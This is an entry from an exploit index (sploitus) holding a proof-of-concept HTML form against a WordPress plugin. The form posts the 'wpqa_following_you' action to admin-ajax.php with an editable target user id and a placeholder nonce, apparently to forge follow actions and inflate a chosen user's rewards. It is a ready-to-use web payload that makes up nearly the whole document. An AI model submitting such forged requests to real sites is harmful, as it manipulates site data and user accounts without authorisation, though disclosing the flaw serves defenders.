## https://sploitus.com/exploit?id=WPEX-ID:E507B1B5-1A56-4B2F-B7E7-E22F6DA1E32A
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpqa_following_you">
<!-- change the following value to the user id of the user you wish to reward! -->
<input type="hidden" name="following_var_id" value="2">
<!-- Version 5.9.1 checks nonce, replace with the correct one for the user submitting the form. -->
<input type="hidden" name="following_nonce" value="1234567890">
<input type="submit" value="Get rich!">
</form>